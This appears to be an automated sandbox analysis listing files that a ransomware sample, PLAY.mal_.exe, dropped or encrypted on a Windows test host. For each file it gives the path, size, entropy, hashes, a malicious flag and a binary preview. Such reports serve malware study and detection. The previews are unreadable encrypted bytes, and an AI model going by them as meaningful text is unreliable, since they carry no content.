        SHA1:BF1A3D705404A26E9EF3B8FA58455213C3E20EB1
        SHA-256:484A2CFA250E98D00B5CA337A5DCEACC3412EDB76BC879C638E0E8141F181D3B
        SHA-512:8DCBE7973534CD28AC1F5A05569FDFF06871D9A7D28FDE7A0325F10C3E5C31F02ACB2CEE88A25E383C357FC587B82CF1266591C65EA8327FC07654C2A2B83154
        Malicious:false
        Preview:.....R.."N.,...)X....2..-b..W@D.n.... ..=R.sT...T..U.|.!.I>..........................H.|.E.Z..1..Gh......tj..I.....R...=>..Z...._w..>..;J_. .D.M.>e...{.fz0A...........{f.t...51#.....&.}`.%.yri.Y".2.R...7.....E...EcJ....S..a..B..<...t.l....8{..v..z...lK.........,..4C....e.I..?0o......4t..R....._<....N./K.....hc.......8>~.i..F@....A..% ....f.v...F.T.........p>[w\...{T.L.`..q..4...aNZ..0i.T9.Z$..k$....T.E.!.!.SG0g^|..0e...^.+\').8O....n.|......]..^."@.XF&(.......:..R.....*.o.....'y..1.Wl..'..F..N..d..~m..wB/.M.%\8=......N,)..v..b.M..y+.i..xvA8...+...yR..GO\q&..Da.e....4.50T.lI.....Ngjykd..&VK).L..p..E;.!.j.bv`......@.i..8..aA.Mh.._.0rNW.O....?..(Mfb.'. ......C..d,.<....c...#.L.1mKV...H...G.....R....e4=..:l..H....r....^. ."...?....:....7.....B...%..9.9.4.......L."{S.T...D...b.21......B<.#...asW. .$m..M.w.R..CAICT..!MD.g..!.5.8M.1$}..z;)W.3..|]On...q.WCVrjh.."...9.P......@..n.1....Z.T...'_....$.....N..NaN..j.^.ard.3.q..K.l.<.........W.b.C....E

        C:\Users\Default\NTUSER.DAT

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):263224
        Entropy (8bit):7.99938002977473
        Encrypted:true
        SSDEEP:
        MD5:24360D4AC64825DB994F83A2F5B0573F
        SHA1:1BEFCF8B056FF425BBE5861964D185FB35ABB72C
        SHA-256:AF89E07116D5326B3B9AB6B833DEE19E7C278194E2C466539DF871CB42577DE5
        SHA-512:48F4D9F12E67AE594861053497113B9A0EA003D5A479D195C9D11098DDC34D5A1F94C097F77F1F7617DA7437BA0F62B71E274B7C0C6CF9E83B182D918524912B
        Malicious:true
        Preview:..]. 8.*.K3C..._2.Q-.#.4.Q._.?..........`?z.C....!.X...}...l......v..>..d.......)y.ai...C....oH3:.d.;..K..d.Q].{.....-%...l...uF_........[r...5u....\QF..5.f.3<-._6.U..G:..Y......^.Q...q.....i ?...6.hW`.@f*.p....7N....0w.P..~..k.A...L.......E~a>%.qB....W.]..1.e..<..x.&.!...sj}..wD....J..i.B.>h.i..G...O/To......1......#..8...T.!0..&$...9e.W0.. ....w.:A].y5......mtT..y...qu._..m..9. ._..p...c-..ME..v...z.cX.l....9....I+...|O...h.A&....b...`..$.Yk*.N..~%.N....4....3H.B&.v..S.%9.2....>.G.+('..z..9.e..*j..T~......%...=.ay...z..$...QX"...l...w..p...[...........z....V.e.4.......O=@R.NB..ou...>..O.6;.F...<.3M..h...wvNIr....y.eRB.!6..[i.R....A.x..U.h*.l\...0.%......<M.aMA......y..'.@z.<.....hX............Pv.....>.s..@.B...I.Jqh.......Wm..r.=......7y>.....q.N..3 u.<UYMi..... .5..-.x-d....i.M.d....|...z.. ....k.n......2..{....^......5'...%~........s.......v<8_../..Z.....o.N...sN.5.........2w........,.t...Y.r.....~....E...|(...X.Q.....4...v././

        C:\Users\Default\NTUSER.DAT.LOG1

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):58424
        Entropy (8bit):7.996939768199055
        Encrypted:true
        SSDEEP:
        MD5:2C13E637DB97E0AA01B93C8203BFE381
        SHA1:9AD3DBEAC571FE196F3F411085363327AF10C4BD
        SHA-256:C5540A18F47614CEFF871CDD499A0CBCB61109C6E5B3DB6DB6FC8DFF6563E8B4
        SHA-512:2FB401D9B23EB361274D6F7BC716D36D6A9AED1DF92A67E326D4D9DB598B221B6A0F1DB54F2B23EC6043CA70AB22BAF360A4203458921BDF802163C9F1D1D1B0
        Malicious:true
        Preview:.>+.%W...q.Xk`..v1...j.....K.W...0.E._....J..).jw.L.%.\........S&...}Ip.#..\...-..A04-.......^..E..sy...x]r1....M..q..UbWd.N..Yf...I. F.]"..8....D.2.2...!.8.....YR.1.B=...IJ....Hq.2.#...{w.N9....3...|.2..:\.......\.7Yd.B.gi;V#..._,.....K.k,.........a..p$.....k3\....x-:......r....cB..O........n..[..3.......5...o3...A..:.Qx..1.4...y?.|./Z......7........&K..4ec....H.r...?....9.{...........,s.Mngo_m....pfk.5.l.z.)....F....pq.N...Q..|.C...,c..Z.....08.8...:..L.....T....3Z.N..1.....-!'T..+.....\G%R9J.........8g...[F...9T^..._.,x....s.u..T.(...p...n?~.....G..qa(+..-.E..)-f.ZP...Z8..9..&...l...r..~......4....<..^,.E........+....6zF....7.O$..Ho+b;?f:Dc..Dh4y.;.>|6....K>....W.6u..|....I.G..q..d..E.o~].g.#.......p..y.m.>^Y...6b>....{.9.jv..-.\..&2.....8v.Vp.#.N..^g....X..9%}.BGIR.x.....u{.....U........1.l...V.WK....8......C.4...H%.,...U.z.8.2.O.3..R0S.E..]}2^.il.;.V2Q.6.c..Q.z9....s.F6. ..e.)....s...%.!d..]...E.&.$............~|.c....a..[|...7.H

        C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):66616
        Entropy (8bit):7.997471827047405
        Encrypted:true
        SSDEEP:
        MD5:B4DB79803D984C840C137378ABDC988B
        SHA1:443AE559D5F2965EEA6980E2C6467D891B08B6B3
        SHA-256:5661255207343C767EE2BE67FB59A66A227B15790257D794F470D13FA40F24CD
        SHA-512:896AD06AC2AEB1C5D630271483408DCEF455C370B9E1E2090377643C1C4DC37F14BDF04C80F502A189FFE45EBD082CCB1CDB3A1D35F1B696D3082367633B0BD1
        Malicious:true
        Preview:.dT\u .dr..Y.}...X-.Z%d.^..G..Lk......>.....`..F.k.......$....0..{}....1......T)Y...Eh..xP....~y..UP....g..vLf..'1.t..X....#..H...~.*....u.'^\.J.u.t.8.;]..K..l..n. ..y.G@..hs....2..7....w.....n...=.+...lKAO.#ve3>..fh...b.R....R..1#N.=.k../6&*..9....*.w..q{A.r.nlr4..Q..O..G....-z......[..`.....,..k.E..#...`.>.......Y.;...]...4......2.N.d.R..r..*xu8......dS'.*.....}C..S..|.-4...c....W+...p.V..O.K..a...f..........mK...:Ts.| .;\.h2.i...Q[.......4...k.:}E...hO...C..'.fmU....Mr.<.RNu..y..F...8.*......K..j.....(...ZW&_...+..xVV./..8..4..28#.bLn.l..F.....L`P..i.q...."..`U...6...7,s....X.......-.g......+..A.u....lI...r.Y.*.....t...,^Qr...v.g...V_BJ......P.~.......H...D.J....2pk0.:..fv....t#.:>.Vi...3...K4....:..o..#d........X.........2.f.-.. ....=....]..'...d3.<N....>k..b>!..G.b}..~.g.S...luI*.(......d...-....zc.R.W6.ES]oR.z.s}-D......{{.'=.0F...t.B".X..$....X...pu%.".;N;...hkN7;..*.ZE..B0.s.r..RV.8......K...|.....v.......w.X.v.c.$.d...0BK-. .

        C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):525368
        Entropy (8bit):7.999604478133905
        Encrypted:true
        SSDEEP:
        MD5:8E31B8AA0206D148E70DF1CA3F657C56
        SHA1:17E983B46D0DBD3319BFD04D0B9E8100ECACF0C1
        SHA-256:C2643B028EB5C11FE1CFF3347BDEC2266D86DC286B151B5DB222C6A063033480
        SHA-512:43307F3264C0C8D07854F926BB44AC1000ECB5481FE58C34EF0ED014670FCF7A472072DBC59C80C0461CA43C8FE3F658D13990A9795BC8F2E57E9D1560DCFE3A
        Malicious:true
        Preview:...P#.C......|.|....._.*.h...fV.\=%l..<.=..3..x......0v.#...g..n.+........7...4.]....$.2\.k..m.C.`8o.L?)..|#0....'..i.J.b........!m...vx...2.T...X.y1...C..bj=_.S...D.C.I^....9......{1.;..iE5..K........m~..o.F....gz.<J.........i....0. .K7....:J. .^..re......L..*.=.>.C.G3^.*.....x.[4.Z|%.T[O;Z..vEtI....B...&9..I..q..m...!....!Y...j2...x........0..w...9..X...|...x!$.,$...Wg....w*.....).T!Y.{`.r.^.."..5.E.Z..2egd4.e..m...+..5....E.UN..eT.....R..3`..8.n..*.+d!....Ha.....E.){M..9..6.K.. ..rv....ejc....Q.vQ..X(..+V... w.:...w..Y;.{.;@ .+a5.b...|gT...{..d77.uP.&..x.rH.....~...F.W7e.....|.\.......#.a3...Yjg..ud.PL.t.w]%.a.I.D..!.?p.J.aWJ..~^.fl..A...o.Ej...z....w..`.....F]l..7.x.y#.4=...m+...)X_amy..b...0.{^9f9..2.Iy..Ct..N...5...'.%d.!,..p+Q}..v.4.<."/h8....HTI78................Z.[..D.Q.%f.]X...My..9)../<...Bc".K7h...................,0xd.`%.,.....cd!.n.!...6(..*.;..!y...L.H/.0?.S.|...m..=.hZ...s<.M....C...(.$...}.gbt..i...8...Q...L.Z.

        C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):525368
        Entropy (8bit):7.999677857021002
        Encrypted:true
        SSDEEP:
        MD5:4A6C32D09CA1CA5D68F952A49FA0C9B0
        SHA1:6AFCEC5C789C341E910BE6DB161703E5FB89EE14
        SHA-256:1FEF4CA49F1D48EDAEDD000BAC4D5CF9B01E18FE591DD4562ED691A7109CB6F0
        SHA-512:11C994F93B5371DFE9FF2067BEB01B9766C3F01FD8D289D8B80A04B70B94550A25F82CAC374730809AC1AA60E82288752B26E8A46ABC5EAC09296A0155CAE16B
        Malicious:true
        Preview:>..z.p..8......\...Z.dl...o.E=".#.R..M..t.sIB...U.56...2y...q.v.8UK.ia..J..]...!.B...n....9z.5y...;y..g:E.S8.w...;....Uct..J%R..~..L....d...V.(&...z....<...h...b...y...X.7........]Y..L..N.<...F..Z.\...v.....tfVMqvS...Z ......+(......"...6.....w+.+.U.C~.......3.%^..5.. ...C......oL.:D.KC.}2.....@7m.../..nUN|g"...'5g....O'.Z...Gd......fV...2..O.|2.a.....BP._..O..1.ghM.!.j.8......E.|Q.jm..t....OT...p...q...s.O...O...j..i........$.RN...&\..VQ...T..........M.w.qU.l..,.%..G..C..nMV.@..Y0._..(..^.u.%,rd......wm`;..u...I..m..[.o....r.^...T.|X.ml.7k..`....R.%..Zj.$.....vL..t....Q@..?.p..R|7~.Ju..P..+..[/..t`.';..RVy.l.L.5..H.<-.#..P.s#..I....>.|.....H.2#.......x0OG..... A.gM...T.......4....Z._d.E:R.{..}...W.-.s.3.D.~y..$.t..C..P..@......XzG.C]vou..sgx..A......L.....%hp. .s.[.'.....[C.B_..?..9.k.]K".!.S.AF2.|...lnXM-.h.>n.P..Eem....e....tH-~.......T$.....4..."./....$...M[.M..).....9..}96.n.4h..y3.j..=.e.[Y.(.V..Q...:.x.C.HL{^....Fe6.FI.i~...

        C:\Users\Public\Desktop\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.836229707938324
        Encrypted:false
        SSDEEP:
        MD5:5B0E4DE08C6577C0A4D8F573B3E355E1
        SHA1:445D7AD38FE3369AA2C48F31DEC79AF0C0A6B5AB
        SHA-256:D6AD79C951E05F015FC28CD463053F2C9CB31AF92D653D01868D2E3F075A3FF8
        SHA-512:6BF7381055343649C1092266FCB1C5CE50AE307D6CAEA7DD70BF045AD6A87DCAB03B709690BD544E9926DC800577C6C77152FD1347EB835FB822E8CDF33B0C7E
        Malicious:false
        Preview:.....H.~."..Zw.A.v.BJ*.x;.0c.g..{..@72....@G@|Zv......?=..{.30.U."j..D......aJ..W...S..}.z.$.t..n...6.k....`.3..N*@.H......]B8;:.]+R.V...$....1,.._..{.,.....R..r..HC]..U|...+...T..U.|.!.I>..........................s...F...3.'..f..V..Q."......Yn.B..1.N9.......F..>^i....U...$H.......,..F].62..I..1..qp.....2.5:AJ.s...IZq!.....~..jI.^k...!...o.G.......]....%..... .R...|h.i........3.,.rT..*j.C..7..Q..6@.(.a",..xY.........'b.u-|'~...+.....y.1.......qA......A^.d..l. ...YM~t).F.B...X._.L../O$.Tt.rw..z...A.`.~..k..).l$a.......A.Bd..?.;..T...w..L.v.hx2.v$V........l....A..~......G..i.j....0......>C..6:Ago..&....X..'....<.?~.(M.`U.l.0.....n.VD....XE.q>....uc.z.&....=....do.(s..I..f...O........0[...&NF..[.Q......+..%0.....(..)d.b;J..20...9.'......o!..<8..._.........)a.....|*rxT%o.c...Z.....]/..y..).n.L....W{.......Gm.@.Xx.>?i..%...as.2;..E.^.J8..@...6.h[Z.L8.1..C......V.).40...w............pbAx......T...T...$..'.en.......gg.;....M.-...6............h.`

        C:\Users\Public\Documents\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1352
        Entropy (8bit):7.849673396173478
        Encrypted:false
        SSDEEP:
        MD5:AF94DBEC8F8B87D13FA9C49A07BBD59F
        SHA1:82A44581C9F80DFECA1577E0B14810CA9387A3C0
        SHA-256:C2922C4061B15B9B3F719938F6A8D5577EEF6461D20297B69286A5B6AC277FB1
        SHA-512:A39B9287AFE68448F1922BEF353DB0CAA9C7410F0AE814EC3301CA6234E65FC7F3F92FFA0BE46ACDDED396D33EB8242E268A5CCE3E8D7E0DFF7D01A2B95B5681
        Malicious:false
        Preview:i..!........+...._.....M........6r..~.:..9qrLcT?..u*...;E.a.TI.3.,...[.w.. UB.....v..1..2.6...q.;...x...=.*.........'..Q.{+W...)7..x..j.*H.....g.0rU;..a......&5..I].U...........i......<.|.fa.C.D......^...I"......A2V...F.bl...w....[......P.4.d....L.0r.......W&...>..Q.....T..U.|.!.I>............................&.ED"....7)95..QRW.N..4/A3.m.U_...2.E.N.e'+....i....d.j.^.\..:...>j.i.Q...........wrB....[...-5..7....(.XeO .........Fv.......^......G..K%...{/.P..{.L.....Sxn.<....}.sf.T....X..V..|.|.:pm.......F.Xp$..d+#....M...j......:......vQ.O.v..H:......+.N....p...`Ar.8.:af..4;.H%.@.o...//;..j.G#.`3V.!&.N..4....zm..H...LK.Q...B.%o.E..!..q.K..'._(=.......g;y.i....u....+.mi........6.e...y$3.......P...YN..fuL.c.../.....u....}.!..'..........ye.#....6.._..I}......k.Z.'x5.UQ..1..r*o..M.'~....?B...<.}=$.J...E....dO?.UGwH....})Y...Z.L.j.7....K.....:..A.t,...M..Jny.kq...{*e..h......-)..E...b.'M...nY.5.'.fO.^...H...E.....Y...&.F?{,q....n^....C

        C:\Users\Public\Music\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:COM executable for DOS
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.852568270849338
        Encrypted:false
        SSDEEP:
        MD5:E9A90AB684F88F7787605EDDFF1FA2DA
        SHA1:AB76293517DFE0878CA229D854BD6BF8432B8386
        SHA-256:E30FE938F29CEAAB61F7524AE2C0AEDDE707DF47BE89578AC0A9EBF9658026D3
        SHA-512:0462896BED29CE27D46BF30E43EE86AE1ED1EF62AEAC9C438778DBC28ABB41432579AF1FF187313538B97AF124F8178669C7E54FEB681948F0D623AC074BBCAC
        Malicious:false
        Preview:.....E.,....d......B.ye..z.3..s..N....q ....R}.....v.XF-.'|W=L+..8(s;/..6........!.wc.k9.'R..^n;...A.E..Et...G3...\....+.F...B>>.....Gp..C...C.0...cn!...!0.%........6.X.^.......[....".3...Xm.....`f.R.}zP.!...8...>k.6tFj.T.t...g...z.N\..X...R..V5..b.nM..Q..1..._0...N....[....J{/m/.e.W...tWF...7[....'.a..yE..C.7h=>..?.7..z.I..K.j].j...H0.}J_yb..d.j....dJ....${.V`...T..U.|.!.I>..........................[.0...)..$/..'.*.#x....?4..sU.,l.#<KE.6..&o...!,"-..R..V<2gs....mC2...S>;....Q.a.&[.....S..P,M...y..%...Z..#/Y.0u...;....(.o.J0..1~U..X..%~..g..hwN...D...OZ...q?..'....kRJ.d.Q,...-=..'z.4)G!.... .....l........EYY...;m..S.u........_].U.....BC.=.....!'....$.*LE.v.7...t7.............'z..t...QLb...-...xQ`]c.~..t...l.M.d.7b..t.....,0....>\...(..?..bB...&h.9E..0):..........C@:S....z......sd..c.,.=. ..RpL6.z\>.r.[^/.*^...bE.u(!w.6.!_rF..z........:OB .x...=6.....0_.r.G.yE6.6..?..w.a..I!.5...K{../..7fWMO......NVD.......'..5.X.[... .....S..c.7I..jK.Q

        C:\Users\Public\Pictures\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.858946323909682
        Encrypted:false
        SSDEEP:
        MD5:AA6F7D329E6DE8E74992E517F0000CD5
        SHA1:F2141BE2617C4415973832030DBA3697C24E026E
        SHA-256:199F56CB72541267B3CFC95472D931FA8980B167F8827DFEFAB8137F11C15B5E
        SHA-512:2DD1ECD7E67B4D8C6482951BCD53B56DCC126D2937905EF36ED16C969A4F1CD91DA0C775780CF9D0D6C4D47F5536B1BA98CF0B745FE125926056C4DCF4B0C3FC
        Malicious:false
        Preview:....TL.._.2...%.gBH3.u..J...?.`..Cd.WvL.r[..w<A.\<........B..7..ut...0...C8.`8.....?(..|.]...E.".C.m.-<Z..D...5....#....K.s.....`.....U.m.........bT.......Sf\.......R.........x...*.jF..#...,...m.....+..h..^>}..D..3....,..x:V.4].;.J.d....C..7>.( ..S.#5._.1.#@A*.8..b|e..it.$).x.t$..6.w..xaE..e.'....$.I..R]....+....t.*.s%.U....#!P.....e.rk.).U^..R?.!.d....l.c.n.*14......T..U.|.!.I>...........................`.K..m.[.w..i...dz....z.B.NMiO....,.@3.]..'.W.&...9.diQ4.p........m..@..+.r0.......\....$.QAer........<.yF...*6.N......g..8.....)....G.L.TNut..z...........~.$.S.Y...=...5....P..D..9F.oE.?*P..qz@......M....#|.6.......Ms .5}...7.t}.WD.3..sL.....wK&.4...a.>.U.\=.C.7.o dQ.x.........t..$.{......Z....?..m.....N.....O....!..Z..8.w...n...Ri....s.u-..^v.<...a.h8..T.v..uA.-..@.y..Ms..M...e... \.N'5A<.{...P..|....cg._b>/.x?.a..b.pC..../2...[.s...;.".ZAgj.N...8#W(.&...,.C....j/(..|b=IO0`...T...%+...S...|...P...VMI.w.<.......W.+...n..>.K(V.R.....

        C:\Users\Public\Videos\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.828961300467192
        Encrypted:false
        SSDEEP:
        MD5:CD143AD3D59B89050F07AC69CD0486BD
        SHA1:10FABDB4ADCC641372BEC0354058C8052B63E9A4
        SHA-256:8D2B84B7028E9F1C290D64EE23B985DDD583530E16BEA4C9095ECA1EC4720998
        SHA-512:0FDD62473CE4F9FDF52EBBA857466DA5FD92ADFFBFFA0ACB86465C4FC0DA8E09701AC19A4346EE2127D33CE81AAB80B75B55DBEBECC24FF037CCCC686A10FADD
        Malicious:false
        Preview:..5....j.lV..}....n..o..M.otwM...C.(...9..9Y.9....g|G..`....o].1..04..7/S...)...L.b2I.<P#S.0.v.(^.=.....Av.[...!..h.J+........@.Y..T....4....A..q._^A..%......~.9"<..@..."p..y.t.}......:.Z+._.%..j..GP.L.1gp....~.....j*.7..........o.^.y..r.B. ....-..$..=....8}....eN.bvp.Z...}.x:..Y.S...[.my.a..;..2fa.5....[.Ag\.Z...|..x.iH.;.'S&.Q..+..&*.r.x`.......)F..;.....d........T..U.|.!.I>..........................W.A.1N.^.[u./.........8>Yt...Y..\.G8H9...!4[....>.7-.Z'......$b..^...%.$.[..7hu.....o^.....;.[s.-.2..4I.....#M;.f..j.O..........%g.TD..MV.>....&.C......!t.vo...7m....p.{7.|3...zD>........:..............Td8...."m..'.3.4..{&....p.m....n......!.....`".>B.O.v7.'....9ri........&=.'.....^....CaL!. @.?.k.yt...u.%>...7m.n5..,:S.zB...AJ...H.o.......:.O?.w...e...(.g.......h=..U..R.H......i.$.........(..1....m`...?.......{.!9.2@.X#0."...*.M..n..J.m.*a..5M...S|..x8.y@.W%H&N..=..Sc..............U.V..~.%p..m.~.p..3..='.............e....uMf...`#....u

        C:\Users\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.811455866078123
        Encrypted:false
        SSDEEP:
        MD5:622D6D135B5C7B3E3E896570ACABA327
        SHA1:DB06F3AE236CC50A6B0B0D76D9E582A15E2516D4
        SHA-256:C81899AA64DFE2F7014F29C5AE53BDD34C8F85B4566EDF1D5CD78C30E9D56C69
        SHA-512:0BCD5809CBA468DCD3E828CD72C78F347D417D3306E193525ACB61815C7723A258A2A48F2562A4307BE19AFD19DB933D750DD9FC21CFCC67B5B09D81FA7C69AD
        Malicious:false
        Preview:G.....VI.g..16.nsf.....7..|.O.h.....iw...._...i.'.8.^..T.........-E.........j.z..*..B..m..%.5.....n....a.u.p.!:.e5.U...2*.*../3.."..2Q...:.a'...d..d.......K..{e!..y-.\`[...T..U.|.!.I>............................i.....>.....2.M<"..8....nMM...1..`7.(.!MO.3A..4....|...&.q.Pa...s........\......<.v8...I.1F"...J0.O...J.3C..r..B@p.p>Ou}.a.=.W..K."..L.[n.g.....A>......OwK.."N....+...c.Z.R\*.i.mu..:...G.O.c.;..B......,1&...U.nW.Ng.Y8d..JR...g.......r..{qwl%.^....(.q..%..c.m...J.r[^Q...5..?.*.....].O...W.be....tx....Q...a..8...)..q..0^..k..6.~....Y...h4..Q.Mx^F..U......g..Z..-.C..~.x.$.]T.0....au.0...3rr..N.D...P..2B......f.X.).*.~..f>..JM....t..:.G.J..~....;S..54*d..8R.^.x."t.y!..-......%.s..........S...Mw....6...&e..J....k...............,.=...........F.....yCT..!.|..[.....^Z.X[.2~V.\.p. 7.....ksw.t.x..n.r7..>.R.3.H.;.]...f.2.R.O..*..z..EMDP...}ns..Dx#.[(r.."U~WC&.&?:.~V....%......E.9.#.U....a..o.j~.V[EB.=.....3...}.......$.R...ePI.U/"V3e.(.j:k...BX.

        C:\Users\user\3D Objects\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1368
        Entropy (8bit):7.847410420936167
        Encrypted:false
        SSDEEP:
        MD5:3095497E37E0AC332B032D470B36AB42
        SHA1:F528A10EADCA2916577D87C8ED83E49F4E60AC4E
        SHA-256:C45576292D017F20CD077BD1558A0BCF1E21058816C42CDB13D2B330EC2BA75F
        SHA-512:0056AA0F8AA5618AAEDDB8DDF0F65063B4661E7BE4FEFF6F0A81AD2AB7E294AFE36E7D1636E763E1E21205B1419F45BDE0D8D2A692B290DE4BE0CBC4E5EBC8BE
        Malicious:false
        Preview:..}..WB.B..0.aD.d.7.L<...Z...2qBi...2...t.+...(v..V..i.@....C.S...wm.+..C.~..0w..i..>.$pE9..E....Eud#.5..Y O...0z1.vXl}.+l........[)..EI.?..Tb-.......=.......7B....B?..F6....C.........3.9.....3..&.....#...X...z..e.d.|..TOYj$1:n.......&--...uF8,wc.....h...g...t..~L.z..`3....8x......?...H%.t*...T..U.|.!.I>...........................?.....K.c2s...R...X...4Z..s......&.;..VH.@c ..vtT6>......{q8X@x..C.p.....0dG$...0.f..-R.MQ......L...*...c..,.o..P.:H...3v...#k..i....Q...PB.[z.I..}...75.gT..t?CZ*Mq....)..Hv{......fM.m..x...b..l..xKZ+a.. ..%.v%%%......'..#.ZH.....m.u.$..V.*|}J..>..r7........&..>..v{.v...0.rw...;-..\`.....g.Ov].N...j.5,.?....gq..e...-.^.C...g....ze...6.."..L..8{.U.FH?....mA..h}..C.C.+.....8.b.".:.........y..H..f.*.<....u.....F..D..f...^..KXk.@......t.D...9 n..>....M8I1Y...^..MTV.|......:.r.$......E.IC....:.5.j........".R....#...Y.1..Y....k.....`.r:....5xq.....f..L./~......N...q..k......./ ..a7!..8&..0.?.....$.CX=J.s...k.y..-...

        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2104
        Entropy (8bit):7.899714902793463
        Encrypted:false
        SSDEEP:
        MD5:DE1FED8FF38F1617BA80BA249E26EDE3
        SHA1:5D295402B596AAB506EC401DD22BE0664E85F64F
        SHA-256:4D3C31488B14FDFFF143F664FFE9D4E1196B2D28FFA2C7251895E42EEDF4C4B9
        SHA-512:303CE9399907D3943B5262518CE0F95EB6B8675AF5BC9287BAC887EE42255849E84AA627017624911EAE2B69FA98F21FC2F165095AA5144FEE3AD8E9B01433D4
        Malicious:false
        Preview:..<L.W^8..~..3O.?..;..I.Y.@{/......2..B<..0...,9S..Ul...k4.q2`X%...+..._.E.....B.Xz=`.E.8K..g}..Q.....CBA..:7...jX.^..,T...lF.t..X..qGt.........K&.]..x6..$...M.i..F.S.#|.-jj..9...4...k.`....d .......i.....W....m...7.p....'..#....th.QX...Ea.H.....^.....Fm).4w..d.d....#.=.o....N.I..8..[..d...J.R...\....X....n..9.S!4..nY...I5..$.nh.F}<"...r|x<.g....ue+;..._d..A..s0....Wgm.ofB..V4.U,g.DU..m...[}|....[PN..[+.....3..1.XXI..+ :......wTG.5.:...n^/...4?X ^.A.CQ...].a..<.....z....U#...|.b._R.V...Z.*@PS......t.]......{..'...x:.)......P^V.w.x.'.}.}V.p+.~..Tx.ev. .O..\<......F..T.VI.....U7.I=.Y#..W....J.6.....\..dK..>~..5p..7]D...xiB....N.y.1.T...E<Z..#...#.J."...dt}.3......-.....~..B88.".L..Z.Ow..v..Ln...#R.f......ld90..%-\..). .?......z9..C..MI2t.+.#.J..........5%....Z.=...Y,.;..*.bg|..</...B...".b....lN../....{(.x.Gg.:.......Yg.*..W.>...+].....e.f.......5=..P...,vWC.&.*.pjB-..i.."..j..f1....6.[.K.IcX.}......m.}.wE...`.R.....V.4.N5..6[.-0F..

        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):158520
        Entropy (8bit):7.998720488603575
        Encrypted:true
        SSDEEP:
        MD5:FBAED002824E68252BF3FA0ACC476C9D
        SHA1:4658E024D4EFA7497ED9E3F0C4088607A7FE1F81
        SHA-256:93D1A5075751BAC59AAC285DD3185ED4EDCB69A7426B10E63078BCC5689112B2
        SHA-512:E7460DB8ED9E82237A486BD2B8AA3E7F20B9F567387C375CE42D9D196DFA2DA04C64E0D6B09EEBB48E0A281E71268459B6E1438202CF55A424F88B1F34AE644B
        Malicious:true
        Preview:{..q..4.xm...."......P..f...#G..{.+b_.z6...(..k...'.LO.Y.....]...`~.+L&......^..1p.8`..L.LMh?Z.j2.:.s.j..ps^k++...<.m.pc..B..".$..0c./.......t1...UJI.G}..A......nfOE8..y.. .v%..G.;.-!..{.F...2M^.u.@._M..W....Xw>....B.X.N....d..eFs...0.g..,D.s..=.....(O*...C.N.........(......,...........g$<$...g...z++`jf_.K&.{....n.YtUppM.':.T.X..(.J..7...4.._...g...)..U.}>S...8.........%....s.^.;.. .>:._....,Z.j...../R.q..'.E3..W.m.}.BiT/.D..F=....6.Y...V.f.SN.`t?3....(p../. .l...y.R.y.GW0.{}A.r}.e..E..(:.C.:N..Z......._......JE./..n....IY......t......4.Nk.S.d0.Y...../..p...}.7U.Q.L..G6.O.......u..|.....OD..QT......./...x.vh..8,../hj,HPId.M...K........y).........J=6.T...t..]}..d....Cs.7.mU.f...l..xn<. .E7y....Z..<%.`#...S.....,_.<......J86.9....<.Z..-.....r...\}..v=.D.n.X......<3.|...8..*.M.T.\<..%-h9.`.{....*..."c......N{8a1..IPK.m..9...\..])....8.Y.`...@N.p.}..\Q.q+.@l.....v.U...F....Bx....l.&a..[.....^...r..0GJohy....qx....(.+...E..&U&g..\...5.t.'K.R.

        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):10632
        Entropy (8bit):7.982951929763402
        Encrypted:false
        SSDEEP:
        MD5:CA3CD2EBA382D61F5E3E91BCF9948227
        SHA1:8CA367B0B03E4FBAF585A2833E583CABC4722148
        SHA-256:E03B3C535F26570881C718BF6D1B198BD6A852AFD7E3227D7BEA6B31EDEB2BD3
        SHA-512:412AD914B1C67BB29C4CC5B28E07668FCD29D0D5049475AEBF8A4B40B06021F07318DDEC3DF2E6DF7081E643A07C836212B728FB4CDA98C709784B7F37E824A2
        Malicious:false
